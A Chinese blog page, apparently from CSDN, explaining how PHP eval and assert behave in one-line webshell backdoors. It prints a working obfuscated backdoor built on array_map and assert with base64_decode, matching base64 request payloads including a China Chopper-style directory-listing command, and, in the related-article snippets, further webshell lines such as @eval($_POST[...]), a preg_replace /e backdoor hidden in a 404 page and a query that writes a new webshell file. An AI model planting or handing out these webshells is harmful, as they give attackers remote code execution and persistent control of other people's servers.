一句话后门中eval和assert的区别

最新推荐文章于 2024-02-03 15:19:32 发布
最新推荐文章于 2024-02-03 15:19:32 发布
阅读量1w 收藏 7
点赞数 1
eval函数中参数是字符,如: 
eval('echo 1;');
assert函数中参数为表达式 (或者为函数),如: 
 assert(phpinfo())
assert(eval('echo 1;'));
直接传递普通代码是无法执行的,如:assert('echo 1;');
下面这个代码执行不了:
@array_map("eval",array('phpinfo();'));
肯定会错:  Warning: array_map() expects parameter 1 to be a valid callback, function 'eval' not found or invalid function name,提示array_map第一个参数需要是回调函数
所以这个后门:
@array_map(assert,(array)base64_decode($_REQUEST['xx']));
array_map第二个参数需要再镶嵌一个assert,
xx=YXNzZXJ0KCRfUkVRVUVTVFsnYWEnXSk=
base64_decode($_REQUEST['xx'])   得到:  assert($_REQUEST['aa'])
其中aa为菜刀中post的数据 
 aa=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskRD1kaXJuYW1lKCRfU0VSVkVSWyJTQ1JJUFRfRklMRU5BTUUiXSk7ZWNobyAkRC4iXHQiO2lmKHN1YnN0cigkRCwwLDEpIT0iLyIpe2ZvcmVhY2gocmFuZ2UoIkEiLCJaIikgYXMgJEwpaWYoaXNfZGlyKCRMLiI6IikpZWNobygkTC4iOiIpO307ZWNobygifDwtIik7ZGllKCk7
这样,会构造出:assert(eval('执行代码')),这个为array_map的第二个参数,
最终将数组中第二个参数回调到第一个数组,执行时代码为:assert(assert(eval('执行代码')) )
另一个例子:
$a=(array)base64_decode($_POST['a']);
array_map(assert,$a);
这时候需要构造post参数为: 
 a=ZXZhbCgnZWNobyAxOycp

(eval('echo 1;'))


whatday
关注
  • 1
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
php后门绕过eval关键字,一些变态的PHP一句后门收集
weixin_42181929的博客
03-18 1756
这类后门让网站、服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的。今天我们细数一些有意思的PHP一句木马。利用404页面隐藏PHP小马404 Not FoundNot FoundThe requested URL was not found on this server.@preg_replace("/[pageerror]/e",$_...
PHP隐形一句后门,和ThinkPHP框架加密码程序(base64_decode)
10-28
今天一个客户的服务器频繁被写入一句后门,删除了还有,原来在程序加入了如下代码,大家可以注意下base64_decode函数的参数。
PHP常见代码执行后门函数(例如evalassert
美奇软件开发工作室
04-23 5691
什么是代码执行: 应用程序在调用一些能够将字符串转换为代码的函数(例如phpeval),没有考虑用户是否控制这个字符串,将造成代码执行漏洞。 常见php代码执行函数介绍 常用执行代码函数 1、eval(): <?php @eval($_POST['hacker']); ?> eval函数将接受的字符串当做代码执行 2、 assert(): 用法和 eval()...
php map 空,PHP-array_map在类不起作用
weixin_35404745的博客
03-12 396
我正在尝试创建一个处理数组的类,但是似乎无法让array_map()在其工作。//Create the test array$array = array(1,2,3,4,5,6,7,8,9,10);//create the test classclass test {//variable to save array inside classpublic $classarray;//functio...
php后门木马常用命令分析与防范
主题模板站的博客
01-21 716
3. 文件包含与生成: require, require_once, include, include_once, file_get_contents, file_put_contents, fputs, fwrite。2. 代码执行与加密: eval, assert, call_user_func,base64_decode, gzinflate, gzuncompress, gzdecode, str_rot13。//可将php代码存于非php后缀文件,例: x.jpg。
php自动生成后门代码,PHP常见代码执行后门函数
xcdm100的博客
02-03 569
应用程序在调用一些能够将字符串转换为代码的函数(例如phpeval),没有考虑用户是否控制这个字符串,将造成代码执行漏洞。,按照 php的格式,表达式在两个/之间,如果在表达式末尾加上一个 e,则第二个参数就会被当做 php代码执行。call_user_func_array(): 方法同上,只是第二个参数要是一个数组,作为第一个参数的参数。函数的第一个参数是被调动的函数,剩下的参数(可有多个参数)是被调用函数的参数。调用回调函数,并把一个数组参数作为回调函数的参数。为数组的每个元素应用回调函数。
一句木马要点和防范注意事项
最新发布
05-24
"一句木马",顾名思义,是指利用简短的代码实现的恶意程序,它通常隐藏在网页、脚本或者其他可执行文件,通过Web服务的漏洞进行植入,以达到远程控制或非法获取服务器权限的目的。这类木马因为其简洁高效的特点...
asp一句.zip
06-28
在ASP技术,“一句木马”通常指的是利用ASP漏洞植入的极简版后门程序,这种后门可以让攻击者通过简单的HTTP请求控制服务器。"asp一句.zip"这个文件可能包含了一个或多个这样的后门示例。 1. ASP基础: ASP是...
Eval一句asp连接
11-10
标题"Eval一句asp连接"的"一句"通常指的是简短的、能够完成特定任务的代码片段。在这里,"Eval一句asp连接"可能指的是使用`Eval`函数来实现ASP页面与数据库或其他服务的快速连接。 ASP是微软开发的一种...
一句的艺术-web提权.pdf
01-25
【一句的艺术-web提权】是关于网络安全的一种高级技巧,主要涉及如何在Web环境,即使在存在各种安全防护措施的情况下,依然能够通过“一句木马”执行任意代码。这篇文章主要探讨了如何在Web应用程序绕过...
evalassert区别
天天学安全专属博客
03-28 578
evalassert区别
简述 asserteval区别
thj_blog
11-09 3275
       首先和大家说明,我所理解的也是在网上查询资料,总结下来的。我尽可能说的通俗易懂一些,看网上的资料,发现很多高大上的东西,我对PHP理解很浅,望大家批评指正。(我所理解的对于初学者够用了)        相同点:二者都可以执行PHP语句。只不过是,eval规范更加严格一些,必须符合PHP代码要求。而assert则没有那么严格,执行PHP表达式即可。并不是对assert无计可施,可以采...
evalassert一句木马分析
weixin_49472648的博客
07-23 2536
利用文件上传漏洞,往目标网站上传一句木马,然后你就可以在本地通过蚁剑等webshell工具即可获取和控制整个网站目录。 一般的php一句后门很容易被网站防火墙waf拦截,而waf通常通过判断关键字来辨别一句木马,要想绕过waf就需要对木马进行一些变形。............
从底层分析evalassert区别
dengzhasong7076的博客
08-12 444
经常会遇上这么一个问题 <?php $_POST['1']($_POST['2']); 在菜刀一般是1=assert&2做为密码连接,或者1=system&2=whoami来执行命令。 <?php eval($_POST['2']); 看看熟悉的一句,这个时候就会想,为啥不能这样1=eval&2连接。 $_POST['1']()这是一个可变函数,...
PHP一句后门过狗姿势万千之后门构造与隐藏
weixin_30454481的博客
02-03 446
第二章节主要带给大家一些后门构造思路,与安全狗文件特征检测的机制。 另外强调一下,这篇文章需要大家对于php有一定的认识。 本章节分为三大部分,第一部分针对初级,分析菜刀php代码的执行过程,较基础;第二部分主要总结一些可以利用的后门姿势,这部分我主要给大家分享一些搜集的后门,希望可以拓展大家的思路;第三部分主要分享后门隐藏之道。 声明:在后门举例大部分后门构造与思路,可能网上都有类似的,...
ctf命令执行小结
舞动的獾
10-04 4498
1.相关函数 eval函数eval函数能够将字符串当作命令去执行 需要被执行的字符串 代码不能包含打开/关闭 PHP tags。比如, ‘echo “Hi!”;’ 不能这样传入: ‘<?php echo "Hi!"; ?>’。但仍然可以用合适的 PHP tag 来离开、重新进入 PHP 模式。比如 ‘echo “In PHP mode!”; ?>In HTML mode!<...
一句木马过狗 php,php过狗一句
weixin_34812649的博客
03-09 511
1、原一句:简单利用方法:?a=assert&b=${fputs(fopen('d.php','w'),'')};复杂利用方法:?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};URL解码...
php assert eval,代码执行函数之一句木马
weixin_28864249的博客
03-23 2037
前言大家好,我是阿里斯,一名IT行业小白。非常抱歉,昨天的内容出现瑕疵比较多,今天重新整理后再次发出,修改并添加了细节,另增加了常见的命令执行函数如果哪里不足,还请各位表哥指出。evalassert区别eval特点eval()会把字符串按照php代码来执行(合法的php代码,以分号结尾)eval()是一个语言构造器,不能被可变函数调用eval($_REQUEST[1]); #eval一句...
1.一句 @evaleval区别
05-12
@evaleval区别在于前者是在函数或类使用的装饰器,而后者是 Python 内置的一个函数。@eval 装饰器可以将字符串作为 Python 代码执行,而 eval 函数也可以执行字符串的 Python 代码,但是使用场景不同。@eval 通常用于动态生成函数或类的情况,而 eval 更适合用于执行一些简单的代码或表达式。另外,由于 @eval 可以执行任意 Python 代码,因此安全性需要特别注意。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值